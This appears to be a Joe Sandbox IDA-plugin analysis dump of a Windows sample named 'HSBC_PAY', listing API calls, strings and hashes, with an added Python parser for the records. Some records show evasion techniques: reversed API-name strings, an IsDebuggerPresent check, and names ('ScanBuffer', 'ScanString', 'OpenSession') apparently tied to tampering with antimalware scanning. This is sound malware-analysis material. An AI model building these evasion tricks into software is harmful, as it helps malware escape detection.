                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID:
                                                                    • API String ID: 481472006-0
                                                                    • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                    • Instruction ID: 4bce93c23e9557b03f432764f6d830f8f53708d96985673f4dfeb4f209d1f602
                                                                    • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                    • Instruction Fuzzy Hash: 2FA0110088882002AA803B280C0223A3088A800A20FC80FA0A8F8802E0EE2E022080E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A8D21D
                                                                      • Part of subcall function 02A8D1E8: GetProcAddress.KERNEL32(00000000), ref: 02A8D201
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                    • API String ID: 1646373207-1918263038
                                                                    • Opcode ID: 4e82901b3b0e7755c08d0c6cfb5615a4cb37ae93ca6397301b9e5eb8c7dd4533
                                                                    • Instruction ID: 0cadf9356afe56f6555f15f03b112544a51cde60fc2160f3d27c338d7fc880f7
                                                                    • Opcode Fuzzy Hash: 4e82901b3b0e7755c08d0c6cfb5615a4cb37ae93ca6397301b9e5eb8c7dd4533
                                                                    • Instruction Fuzzy Hash: 97415D61A85A189B6A087A7D7900867BBDADA887343E0442BF408CF7C5DD30BD574F69
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02A96E5E
                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02A96E6F
                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02A96E7F
                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02A96E8F
                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02A96E9F
                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02A96EAF
                                                                    • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02A96EBF
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                    • API String ID: 667068680-2233174745
                                                                    • Opcode ID: c1f05e2bb71cea9994b686809465ffe8e08e228645b2237f5a9e681b27e3f5b5
                                                                    • Instruction ID: fb812a8582a954fc60e0f96d52c182f6504fa41fa167b646e34b88ee1073ad05
                                                                    • Opcode Fuzzy Hash: c1f05e2bb71cea9994b686809465ffe8e08e228645b2237f5a9e681b27e3f5b5
                                                                    • Instruction Fuzzy Hash: 87F045B1AC97927EBB04BF729E819272BDDBE01F04750193A644369902EFB5C8164F60
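The two records above locate oleaut32.dll Var* exports and ole32.dll Co* exports through GetModuleHandleA/GetProcAddress instead of a static import table. Those particular names are consistent with the Delphi RTL's late binding of OLE/COM helpers (the SOFTWARE\Borland\Delphi\RTL registry read further down confirms the toolchain), but the same pattern is also how a packer hides the imports that matter, so it is worth pulling out mechanically. The following Python is an added example, not part of the Joe Sandbox report: a small parser for the record format shown on this page that reports, per function, which DLL is opened and which export names are resolved at run time. The sample text is a trimmed copy of the two records above; the field names and the 12-character opcode-ID key are this example's own choices.

```python
"""Parse Joe Sandbox IDA-plugin function records ('APIs' / 'Similarity' blocks)
and summarise which exports each function resolves at run time.

Example code written for this page; the record layout follows the report
text above, everything else (names, keys) is an assumption of the example."""

import re
from dataclasses import dataclass, field

# Constructed sample: trimmed copies of the oleaut32.dll and ole32.dll records above.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A8D21D
  • Part of subcall function 02A8D1E8: GetProcAddress.KERNEL32(00000000), ref: 02A8D201
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: 4e82901b3b0e7755c08d0c6cfb5615a4cb37ae93ca6397301b9e5eb8c7dd4533
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02A96E5E
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02A96E6F
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02A96E7F
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoCreateInstanceEx$CoInitializeEx$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: c1f05e2bb71cea9994b686809465ffe8e08e228645b2237f5a9e681b27e3f5b5
"""

# One API line: optional "Part of subcall function X:" prefix, then Api.MODULE(args), ref: addr
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
PLACEHOLDERS = {"00000000", "?", ""}  # arguments IDA could not resolve


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    calls: list = field(default_factory=list)   # (api, module, [args], ref, subcall or None)
    string_id: list = field(default_factory=list)


def parse_records(text):
    """Split the report text into FunctionRecord objects, one per 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append((m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("String ID:"):
            cur.string_id = [s for s in line.split(":", 1)[1].strip().split("$") if s]
    return records


def dynamic_imports(rec):
    """Return (dll, sorted export names) when the function resolves APIs via
    GetModuleHandle*/GetProcAddress, else None."""
    dll, names, seen_getproc = None, set(), False
    for api, _mod, args, _ref, _sub in rec.calls:
        if api.startswith("GetModuleHandle") and args and args[0].lower().endswith(".dll"):
            dll = args[0]
        elif api == "GetProcAddress":
            seen_getproc = True
            if len(args) > 1 and args[1] not in PLACEHOLDERS:
                names.add(args[1])
    if dll is None or not seen_getproc:
        return None
    # The String ID lists every literal the function references; when the
    # GetProcAddress call sits in a subroutine (oleaut32 record) the export
    # names only appear there, so merge the non-DLL tokens in.
    names.update(s for s in rec.string_id if not s.lower().endswith(".dll"))
    return dll, sorted(names)


def summarise(text):
    """Map a short opcode-ID prefix to the (dll, exports) it resolves dynamically."""
    out = {}
    for rec in parse_records(text):
        res = dynamic_imports(rec)
        if res:
            out[rec.opcode_id[:12]] = res
    return out


if __name__ == "__main__":
    for key, (dll, exports) in summarise(SAMPLE).items():
        print(f"{key}  {dll:<14} {', '.join(exports)}")
```

Run against the full report text rather than the sample, the summary gives a quick list of every function that builds its own import table, which is the first place to look when the static import table of a packed sample is nearly empty.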
                                                                    APIs
                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02A828CE
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                    • API String ID: 2030045667-32948583
                                                                    • Opcode ID: 737cf7c6b756bdc007008754f1437b1ed68d2522485674bde860fa4090df512b
                                                                    • Instruction ID: 32d07e198c4f8c1e46600f9f5b9b977951a19165f01a17352d7ee43313617dfd
                                                                    • Opcode Fuzzy Hash: 737cf7c6b756bdc007008754f1437b1ed68d2522485674bde860fa4090df512b
                                                                    • Instruction Fuzzy Hash: 5CA1C130A042D48BEF21BB2CCC84BB9BAF5EB09750F1440E5ED49AB285CF758989CF51
                                                                    Strings
                                                                    • An unexpected memory leak has occurred. , xrefs: 02A82690
                                                                    • , xrefs: 02A82814
                                                                    • Unexpected Memory Leak, xrefs: 02A828C0
                                                                    • The unexpected small block leaks are:, xrefs: 02A82707
                                                                    • bytes: , xrefs: 02A8275D
                                                                    • 7, xrefs: 02A826A1
                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A82849
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                    • API String ID: 0-2723507874
                                                                    • Opcode ID: 1485e7066273d7331976a2d391bca5776e99aaa353895db8151088ff474a6d2a
                                                                    • Instruction ID: fdcece71769f0347612566b56189e04db610367b0f5fb698a1f921f14c24ee2b
                                                                    • Opcode Fuzzy Hash: 1485e7066273d7331976a2d391bca5776e99aaa353895db8151088ff474a6d2a
                                                                    • Instruction Fuzzy Hash: D371A030A042D88FEF21BB2CCC84BE9BAF5EB09754F1041E5D949AB281DF758A85CF51
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000000,02A8C00B,?,?,00000000,00000000), ref: 02A8BD76
                                                                      • Part of subcall function 02A8A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    Similarity
                                                                    • API ID: Locale$InfoThread
                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                    • API String ID: 4232894706-2493093252
                                                                    • Opcode ID: 05afff34b131aa8ce07b18a6b23943b7f10d01bd71049e34dff70856975f1b59
                                                                    • Instruction ID: a0688e9d0030671ac629e2457d5b74ad94c0ceaf2191f91575483392f8a16d92
                                                                    • Opcode Fuzzy Hash: 05afff34b131aa8ce07b18a6b23943b7f10d01bd71049e34dff70856975f1b59
                                                                    • Instruction Fuzzy Hash: 1A614F34B802499BDB05FBA4DD90A9FB7B7AB48300F509836E101EB645DE39DD069FA0
                                                                    APIs
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9AE38
                                                                    • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02A9AE4F
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9AEE3
                                                                    • IsBadReadPtr.KERNEL32(?,00000002), ref: 02A9AEEF
                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A9AF03
                                                                    Similarity
                                                                    • API ID: Read$HandleModule
                                                                    • String ID: KernelBase$LoadLibraryExA
                                                                    • API String ID: 2226866862-113032527
                                                                    • Opcode ID: 9235cc2223be4e02ccc3e193d7cd99c3f1128ea94bfaa173ccae814eb59a7cb9
                                                                    • Instruction ID: 950ad84970e00217b7c1480047d6d674d4d4a080a3e3b25858a7092bc212f194
                                                                    • Opcode Fuzzy Hash: 9235cc2223be4e02ccc3e193d7cd99c3f1128ea94bfaa173ccae814eb59a7cb9
                                                                    • Instruction Fuzzy Hash: 5D3170B1A40215BBEF10DF6ACDC1F9A77FDEF05718F004511EA449B281DB34A950CBA0
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?,02AE07C8,?,?,02AAD7A8,02A8655D,02AAC30D), ref: 02A84365
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?,02AE07C8,?,?,02AAD7A8,02A8655D,02AAC30D), ref: 02A8436B
                                                                    • GetStdHandle.KERNEL32(000000F5,02A843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?,02AE07C8), ref: 02A84380
                                                                    • WriteFile.KERNEL32(00000000,000000F5,02A843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A843F3,?,?), ref: 02A84386
                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02A843A4
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$Message
                                                                    • String ID: Error$Runtime error at 00000000
                                                                    • API String ID: 1570097196-2970929446
                                                                    • Opcode ID: b257e5fae001ea063c6e0b95d3007a78080f2dc4fe0b8e4682315e217a525fca
                                                                    • Instruction ID: b65d11d6669f5dd6612654c31bd8bc49b5c0e3c028f63d2f8d8f48402206b784
                                                                    • Opcode Fuzzy Hash: b257e5fae001ea063c6e0b95d3007a78080f2dc4fe0b8e4682315e217a525fca
                                                                    • Instruction Fuzzy Hash: 96F0B460AC5341B9FB14B760AE86F69675CAB48F14F540E4CB265A94C4DFA090CACB26
                                                                    APIs
                                                                      • Part of subcall function 02A8ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A8ACD9
                                                                      • Part of subcall function 02A8ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A8ACFD
                                                                      • Part of subcall function 02A8ACBC: GetModuleFileNameA.KERNEL32(02A80000,?,00000105), ref: 02A8AD18
                                                                      • Part of subcall function 02A8ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A8ADAE
                                                                    • CharToOemA.USER32(?,?), ref: 02A8AE7B
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02A8AE98
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A8AE9E
                                                                    • GetStdHandle.KERNEL32(000000F4,02A8AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A8AEB3
                                                                    • WriteFile.KERNEL32(00000000,000000F4,02A8AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A8AEB9
                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02A8AEDB
                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02A8AEF1
                                                                    Similarity
                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                    • String ID:
                                                                    • API String ID: 185507032-0
                                                                    • Opcode ID: 87ca59c4535ae5374039a550289f17ba55fbb0357fd8cf82d93abaeffee4a558
                                                                    • Instruction ID: 9ac10b71fa4d86c06a3453bb1fae03479b3b0b11433b4b1ebeb32ea72754a206
                                                                    • Opcode Fuzzy Hash: 87ca59c4535ae5374039a550289f17ba55fbb0357fd8cf82d93abaeffee4a558
                                                                    • Instruction Fuzzy Hash: E91170B25C4240BAE200FBA4CD81F9B77EEAB44710F40092BB755DA1D1DE70E944CF66
                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A8E5A5
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A8E5C1
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02A8E5FA
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A8E677
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02A8E690
                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 02A8E6C5
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-0
                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                    • Instruction ID: 488165f8040955c23bb0077e88320f7e02a2ebdd5be6ad4b8b50b761bc2d8af8
                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                    • Instruction Fuzzy Hash: E051E5759406299BCB26EB68CE80BD9B3FDAF4D314F0041E5F609E7251DA30AF858F60
                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A8358A
                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02A835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A835BD
                                                                    • RegCloseKey.ADVAPI32(?,02A835E0,00000000,?,00000004,00000000,02A835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A835D3
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                    • API String ID: 3677997916-4173385793
                                                                    • Opcode ID: fb4b18b85771f393140cfb63dad60b1e9ef33c991a9bfe3ca1d154d948d253bf
                                                                    • Instruction ID: fea54bc9b475fcff63d83d8fc6793d0a98fd8d68c96a6a7904b6ce26a6451ee9
                                                                    • Opcode Fuzzy Hash: fb4b18b85771f393140cfb63dad60b1e9ef33c991a9bfe3ca1d154d948d253bf
                                                                    • Instruction Fuzzy Hash: 4401B575940208BAEB11EB908D42BBEB7ECEB08B10F1005B1BA05D6980FB74D611CA59
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                    • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                    • API String ID: 667068680-1372893251
                                                                    • Opcode ID: a402c0a02721cce11dc80471eb0cf32e042b82b346f1c03957909828e7d3af6c
                                                                    • Instruction ID: cf1b2a643e9ba21618c04fc667608a76af8a249dc42b45fcaaa083b2295aec24
                                                                    • Opcode Fuzzy Hash: a402c0a02721cce11dc80471eb0cf32e042b82b346f1c03957909828e7d3af6c
                                                                    • Instruction Fuzzy Hash: 5F014F74A80309BFEF00FBA5D941A9E7BEEFB49B10F914464A404D7A00DE34AD058F20
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(?,00000000,02A8AA67,?,?,00000000), ref: 02A8A9E8
                                                                      • Part of subcall function 02A8A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02A8AA67,?,?,00000000), ref: 02A8AA18
                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02A8AA23
                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02A8AA67,?,?,00000000), ref: 02A8AA41
                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02A8AA4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                    • String ID:
                                                                    • API String ID: 4102113445-0
                                                                    • Opcode ID: f2678bbec4ca094d56ccefe29dd19d86ffa53ff616134036d9b2deec4dcd4815
                                                                    • Instruction ID: c542fcf4d3b2bf1b516f7e106e78832a780f0681058e9d533318ff198118a13b
                                                                    • Opcode Fuzzy Hash: f2678bbec4ca094d56ccefe29dd19d86ffa53ff616134036d9b2deec4dcd4815
                                                                    • Instruction Fuzzy Hash: 7B01A7756806447BF701F6748E12B6EB35DEB45B10F910561F611AAA81DE749E004A64
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(?,00000000,02A8AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02A8AAAF
                                                                      • Part of subcall function 02A8A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoThread
                                                                    • String ID: eeee$ggg$yyyy
                                                                    • API String ID: 4232894706-1253427255
                                                                    • Opcode ID: 1c54777e33f455b455b5aaa4004d332493ea4ea3d5d83809b0f94a35537a70d5
                                                                    • Instruction ID: a639e27affe5d5ade3d8715de65f7534676a65986877b3f33d35face215b3aef
                                                                    • Opcode Fuzzy Hash: 1c54777e33f455b455b5aaa4004d332493ea4ea3d5d83809b0f94a35537a70d5
                                                                    • Instruction Fuzzy Hash: 4141F5B074410A8BD711FBA88AC037EF3F7EB89300B504527D662C7346EE78DD058A21
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                    • API String ID: 1883125708-1952140341
                                                                    • Opcode ID: c3e7a849aa89644c251d930cd031e16d557b27d93936e88053d64bbce14e2348
                                                                    • Instruction ID: c854e159cd88aa193fd0ef2b03283b2e42983c794bd59ffa87797c90a6de4779
                                                                    • Opcode Fuzzy Hash: c3e7a849aa89644c251d930cd031e16d557b27d93936e88053d64bbce14e2348
                                                                    • Instruction Fuzzy Hash: 3CF06D70680309EFEF40FBA5DD4296E77EDFB4AB40B9109A0F404D7A00DE34AD518A60
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KernelBase,?,02A9EF90,UacInitialize,02AE137C,02AAAFD0,UacScan,02AE137C,02AAAFD0,ScanBuffer,02AE137C,02AAAFD0,OpenSession,02AE137C,02AAAFD0,ScanString), ref: 02A9EB92
                                                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A9EBA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: IsDebuggerPresent$KernelBase
                                                                    • API String ID: 1646373207-2367923768
                                                                    • Opcode ID: 88f4691e557ed4b865f90e862c0c34fb0adede57b0653dc29e57b86df76c82e3
                                                                    • Instruction ID: 99d518a444396b4e5d73e6493e6983d615b267b6fcf89614580878f3c77b2f42
                                                                    • Opcode Fuzzy Hash: 88f4691e557ed4b865f90e862c0c34fb0adede57b0653dc29e57b86df76c82e3
                                                                    • Instruction Fuzzy Hash: 58D012B13913902DFE04B6F50EC4C1D02CD950592D7244E72B223D50D3FD66C8511511
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,02AAC10B,00000000,02AAC11E), ref: 02A8C3FA
                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02A8C40B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
